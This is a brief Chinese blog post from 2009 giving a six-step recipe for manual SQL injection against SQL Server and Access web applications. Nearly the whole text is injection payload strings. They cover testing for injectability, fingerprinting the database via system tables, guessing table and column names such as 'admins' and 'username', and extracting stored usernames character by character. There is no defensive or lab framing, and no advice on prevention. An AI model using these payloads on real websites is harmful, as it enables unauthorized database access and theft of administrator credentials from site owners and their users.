Posted on 2009-10-20 09:35  张天利  阅读(619)  评论(0)    收藏  举报

1、判断是否存在注入的可能。 ',and user>0, and 1=1,and 1=2.
2、判断数据库类型。and (select count(*) from sysobjects)>0 (sqlserver),
     and (select count(*) from msysobjects)>0 (Access).
3、猜解数据表。 and (select count(*) from user)>0.
4、猜解列名。 and (select count(username) from admins)>0.
5、猜解第一条记录的长度。and (select top 1 len(username) from admins)>0.
6、猜解字符。 and (select top 1 asc(mid(username,1,1)) from admins)>0.
至此注入完成。